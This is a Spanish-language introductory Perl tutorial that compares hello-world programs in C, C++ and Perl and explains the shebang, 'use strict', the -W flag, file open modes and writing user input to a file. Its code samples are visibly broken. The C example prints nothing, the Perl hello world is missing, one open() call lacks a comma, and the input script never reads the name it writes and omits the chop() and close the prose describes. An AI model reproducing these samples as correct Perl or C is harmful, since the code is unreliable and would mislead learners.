o_O ). Empecemos por una básica comparación C - C++ -Perl : Hola mundo en C#include <stdio> int main(void) { }
Hola Mundo en C++#include <iostream> int main(void) { cout << "Hola mundo!\n"; }
Hola Mundo en Perl
O bien podemos usa el SheBang para invocar al interprete de Perl, o bien para invocar una versión específica, o pasar parámetros a dicho intérprete en caso de querer que sea ejecutado de otra forma, o bien muchas cosas que pueden ver en la página correspondiente de perlrun, aqui: http://perldoc.perl.org/perlrun.html#DESCRIPTIONY empiezan nuestras posibilidades ilimitadas con Perl... ya que podríamos usar éste modo: #!/usr/bin/env perl -W use strict;
Y entonces introduciríamos el control de calidad del pragma strict, con el que, por ejemplo, no podremos inicializar una variable sin usar my. En general lo que hace la directiva sctrict es generar errores al programas en caso de que se encuentre lo que pueda considerar "programación insegura" A demás usamos el parametro -W con lo que activamos todas las advertencias (Warnings). Pueden encontrar mucha información de PERL en wikipedia... UNA INTRODUCCION Pero empecemos con algo útil... una de las mayores capacidades de Perl es Escribir y Leer ficheros (Aunque no haya sido su significado desde un principio, actualmente Perl se conoce por las siglas Practical Extraction and Report Language... a tal punto que es la cabecera de su página de manual de Unix) Para abrir un fichero en Perl hay que usar open()... y otra vez, recuerden que HAY MAS DE UNA FORMA DE HACERLO, tal es así que entre la documentación de perl encontramos una página llamada perlopentut en la que encontraremos muchos trucos acerca de la apertura de ficheros. Para usuarios de sistemas Unix (ej: Linux) pueden abrir una terminal y escribir perldoc perlopentut. Usuarios de debian o sistemas similares (ej: ubuntu) necesitaran instalar el paquete perl-doc lo cual pueden hacer mediante el comando sudo apt-get install perl-doc. Pueden ver una lista de la enorme cantidad de documentacion disponible con el comando man perl o perldoc perl. NOTA: Perl es una herramienta diseñada para sistemas UNIX aunque hoy en día soporta múltiples plataformas. Para correr Perl debes tener instalado el intérprete de Perl. Puedes visitar www.perl.com o www.perl.org para ver lo referente a tu sistema operativo. La documentación del comando perldoc incluye notas para muchos sistemas distintos, ver la lista en perldoc perlPasemos al grano: UNA FORMA DE ABRIR Y ESCRIBIR UN FICHERO EN PERL:#!/usr/bin/perl -W # Esto es un comentario, lo que viene es la variable con la ruta... my $Ruta_Fichero="/home/d4rio/perlscripts/utils/escribime.text"; # Ahora abro el fichero para escribirlo... open IDENTIFICADOR "> $Ruta_Fichero";
Hasta ahi es suficiente para que expliquemos algo:: lo que sigue a open es el identificador del fichero (filehandle). Usaremos ese identificador para referirnos al fichero abierto en adelante. El signo ">" que usamos significa que escribiremos en el fichero. Es simple, se usan las mismas notaciones que usaríamos en la consola, por ejemplo, en una consola de UNIX, ésto: echo "Escribo algo" > nombre_de_fichero;
...sería mandar la salida de ese comando a "nombre_de_fichero"... pero NO CONTINUANDO. En DOS o la consola de Windows es igual: echo "Hola, como andan?" > archivo.txt
...escribiría "Hola, como andan?" en el fichero "archivo.txt" pero NO CONTINUANDO NOTA: Con "NO CONTINUANDO" me refiero a que si el archivo contenía algo será borrado en vez de continuar al final del fichero.Para abrir un archivo se pueden usar varios modos: | Modo de lectura: Lee el fichero | < | | Modo de escritura: Sobreescribe el fichero (si habia algo lo borra) | > | | Modo de escritura: Escribe al final del fichero | >> |
Pero se puede usar una tubería para pasar la salida de un comando a nuestro programa como si leyeramos un fichero, o bien pasar todo lo que escribamos en el identificador a un comando. Si desean ver los miles de usos de open vean perldoc perlopentutAhora iremos pidiendo los datos de una persona y al final los meteremos en un fichero: #!/usr/bin/env perl # PIDO LOS DATOS print "Hola, necesito que me des unos datos...\n\n"; $APELLIDO=<STDIN>; # ABRO EL FICHERO open (MI_LOG , ">", "/home/d4rio/perlscripts/utils/profile.nada") or die "NO SE PUEDE CREAR EL FICHERO!\n"; # ESCRIBO print MI_LOG "Nombre: $NOMBRE Apellido:$APELLIDO\n"; # CIERRO EL ARCHIVO
Como ven incluimos otra forma de abrir el fichero (que consume unos bytes más de memoria), y la capacidad de procesar un error (NO SE PUEDE CREAR EL FICHERO)... Vemos tambien chop() que es una funcion para quitar el último carácter, que es en general el retorno de carro y por eso siempre se quita. Tambien vemos cómo asignar a una variable el valor introducido en la Entrada Standard (<STDIN>). Como verán es un lenguaje muy flexible, y eso que todavía no vimos nada más que una introducción. Ya veremos otras capacidades de Perl, como la gran facilidad para manejarnos con conexiónes a Internet, pero no alcanzaremos a contemplar toda la capacidad de éste lenguaje, como Interfaces gráficas con Qt, interacción con OLE en Windows, capacidad de manejar imágenes, actuar como CGI en programación web, Tratar con bases de datos, etcétera... BUENO, ësta fue la INTRODUCCION A PERL }=) ::. En otra ocasión nos adentraremos en éste vasto lenguaje, el LENGUAJE-AMIGO-DEL-HACKER. |
|
|
|
|
|
| |
|
